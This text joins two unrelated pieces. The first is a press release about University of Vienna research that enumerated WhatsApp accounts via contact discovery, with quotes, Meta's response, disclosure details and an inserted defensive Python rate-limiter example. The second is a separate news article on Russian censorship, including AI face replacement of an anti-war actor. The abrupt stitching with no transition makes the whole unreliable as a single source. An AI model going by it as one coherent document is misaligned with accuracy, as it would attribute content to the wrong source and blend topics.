The study did not involve access to message content, and no personal data was published or shared. All retrieved data was deleted by the researchers prior to publication. Message content on WhatsApp is “end-to-end encrypted” and was not affected at any time. “This end-to-end encryption protects the content of messages, but not necessarily the associated metadata,” explains last author Aljosha Judmayer from the University of Vienna. “Our work shows that privacy risks can also arise when such metadata is collected and analysed on a large scale.”
“These findings remind us that even mature, widely trusted systems can contain design or implementation flaws that have real-world consequences,” says lead author Gabriel Gegenhuber from the University of Vienna. “They show that security and privacy are not one-time achievements, but must be continuously re-evaluated as technology evolves.”
"Building on our previous findings on delivery receipts and key management, we are contributing to a long-term understanding of how messaging systems evolve and where new risks arise," adds co-author Maximilian Günther from the University of Vienna.
“We are grateful to the University of Vienna researchers for their responsible partnership and diligence under our Bug Bounty program. This collaboration successfully identified a novel enumeration technique that surpassed our intended limits, allowing the researchers to scrape basic publicly available information. We had already been working on industry-leading anti-scraping systems, and this study was instrumental in stress-testing and confirming the immediate efficacy of these new defenses. Importantly, the researchers have securely deleted the data collected as part of the study, and we have found no evidence of malicious actors abusing this vector. As a reminder, user messages remained private and secure thanks to WhatsApp’s default end-to-end encryption, and no non-public data was accessible to the researchers,” says Nitin Gupta, Vice President of Engineering at WhatsApp.
Ethical Handling and Disclosure
The research was conducted with strict ethical guidelines and in accordance with responsible disclosure principles. The findings were promptly reported to Meta, the operator of WhatsApp, which has since implemented countermeasures (e.g., rate-limiting, stricter profile information visibility) to close the identified vulnerability. The authors argue that transparency, academic scrutiny, and independent testing are essential to maintaining trust in global communication services. They emphasize that proactive collaboration between researchers and industry can significantly improve user privacy and prevent abuse.
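The flaw described above was a lookup endpoint that answered an effectively unlimited number of contact-discovery queries from a single source; the countermeasures named here are rate-limiting and stricter profile visibility. The following is an added example, not WhatsApp's or the researchers' code, showing what both look like on the server side: a per-source sliding-window limiter that refuses and flags callers who exceed a lookup budget, and a lookup routine that only returns the profile fields a user has set to public. The account directory, limits and client names are constructed for illustration.

```python
from collections import deque
import time

# Constructed limits for illustration: a legitimate address-book sync is
# thousands of numbers per hour, not the >100 million/hour the study observed.
WINDOW_SECONDS = 3600
MAX_LOOKUPS_PER_WINDOW = 5000

# Constructed directory (not real data): phone number -> account record.
ACCOUNTS = {
    "+4366400000001": {"pubkey": "k1", "about": "hi",   "about_public": True,
                       "picture": "pic1.jpg", "picture_public": False},
    "+4366400000002": {"pubkey": "k2", "about": "busy", "about_public": False,
                       "picture": "pic2.jpg", "picture_public": True},
}


class LookupLimiter:
    """Sliding-window budget of looked-up numbers per calling source."""

    def __init__(self, window=WINDOW_SECONDS, max_lookups=MAX_LOOKUPS_PER_WINDOW):
        self.window = window
        self.max_lookups = max_lookups
        self._history = {}   # source -> deque of (timestamp, numbers_in_batch)
        self._totals = {}    # source -> numbers looked up inside the window
        self.flagged = set() # sources that hit the ceiling (for alerting)

    def _expire(self, source, now):
        q = self._history.setdefault(source, deque())
        total = self._totals.get(source, 0)
        while q and now - q[0][0] >= self.window:   # drop batches outside window
            _, n = q.popleft()
            total -= n
        self._totals[source] = total
        return q, total

    def allow(self, source, n_numbers, now):
        """Charge a batch of n_numbers to source; False (and flag) if over budget."""
        q, total = self._expire(source, now)
        if total + n_numbers > self.max_lookups:
            self.flagged.add(source)
            return False
        q.append((now, n_numbers))
        self._totals[source] = total + n_numbers
        return True


def discover_contacts(limiter, source, numbers, now=None):
    """Return public records for registered numbers, or None if the batch is refused."""
    now = time.time() if now is None else now
    if not limiter.allow(source, len(numbers), now):
        return None
    result = {}
    for num in numbers:
        acct = ACCOUNTS.get(num)
        if acct is None:
            continue                       # unregistered numbers are simply absent
        rec = {"pubkey": acct["pubkey"]}   # needed by clients to start a session
        if acct["about_public"]:           # only fields the user made public
            rec["about"] = acct["about"]
        if acct["picture_public"]:
            rec["picture"] = acct["picture"]
        result[num] = rec
    return result
```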
Research Context
This publication represents the third study by researchers from the University of Vienna and SBA Research examining the security and privacy of prevalent instant messengers such as WhatsApp and Signal. The team investigates how design and implementation choices in end-to-end encrypted messaging services can unintentionally expose user information or weaken privacy guarantees.
Earlier this year, the researchers published "Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers" (distinguished with the Best Paper Award at RAID 2025), which demonstrated how silent pings and their delivery receipts could be abused to infer user activity patterns and online behavior on WhatsApp and similar messaging platforms. Later that same year, "Prekey Pogo: Investigating Security and Privacy Issues in WhatsApp's Handshake Mechanism" (presented at USENIX WOOT 2025) analyzed the cryptographic foundations of WhatsApp's prekey distribution mechanism, revealing implementation weaknesses of the Signal-based protocol.
"By building on our earlier findings about delivery receipts and key management, we're contributing to a long-term understanding of how messaging systems evolve, and where new risks emerge." said Maximilian Günther (University of Vienna).
The current study, "Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy", extends this line of research to the global scope, showing how contact discovery mechanisms can unintentionally allow large-scale user enumeration at an unprecedented magnitude. It will appear in the proceedings of the NDSS Symposium 2026, one of the leading international conferences on computer and network security.
Publication: Gabriel K. Gegenhuber, Philipp É. Frenzel, Maximilian Günther, Johanna Ullrich and Aljosha Judmayer: Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy. In: Network and Distributed System Security Symposium (NDSS), 2026.
The European Correspondent
Dmitriy Beliaev
A Russian series released in October used AI to replace actor Maxim Vitorgan’s face – and removed his name from the credits. Vitorgan reported it himself on social media, while the streaming platform Kion offered no explanation.
It was the second time the actor had been digitally erased and replaced with AI – a punishment for his vocal opposition to the war in Ukraine. On the first day of the invasion in 2022, he posted a black square on Instagram with the caption “Shame” to his 700,000 followers. That led to his removal from another show in 2023.
Erasing “undesirable” actors, writers, and musicians has become routine in Russia, where censorship has tightened its grip on cultural life since the country’s full-scale invasion of Ukraine.
TV channels and streaming platforms now not only blur or replace actors with AI, but also cut entire scenes – scrubbing away unwanted dialogue, characters, or references that the state considers unwelcome.
In April 2025, a TV channel removed a map of Odesa and cut a reference to the 2006 deportation of Georgian citizens from Russia in a 2010 film (which also featured Vitorgan). In June, Russian streaming services removed a line mentioning Putin’s death from a 2024 Spanish thriller Rich Flu.
Censorship now extends far beyond politics, reshaping even harmless scenes: in early November, following a law banning so-called “LGBT propaganda”, a Russian online cinema cut a Fight Club (1999) scene showing men kissing.
It goes beyond films. Several broadcasters have been fined for airing music videos deemed “LGBT propaganda”. In January 2023, a court fined the TNT Music channel one million rubles (roughly €10,600) over a music video Hallucination by Regard and Years & Years.
A year later, another broadcaster, Tochka TV, was fined for airing a music video by pro-regime singer Nikolai Baskov for containing “LGBT propaganda” because of “the lyrical subject’s relationship with a male”. The video had aired on television without issue before. After the new laws came in, some Russian artists began deleting their old videos from YouTube and social media.
Publishers are also blacking out entire paragraphs in books. Even a biography of Italian director Pier Paolo Pasolini was censored, with about a fifth of the text removed because it described an openly gay filmmaker's personal life.
The invasion of Ukraine has triggered a kind of patriotic cultural revolution. Actors, directors, and musicians who publicly opposed the war have been effectively blacklisted – removed from the big screens, stripped of work, and, in many cases, pushed into exile. Some have been declared “foreign agents”, a status that severely restricts civil rights and professional opportunities.
Some songs by these “agents” are being removed from Russian streaming platforms, and performing them publicly can lead to fines or even arrest. In the most recent case, in October, several young street musicians in St Petersburg were arrested for singing songs by anti-war artists.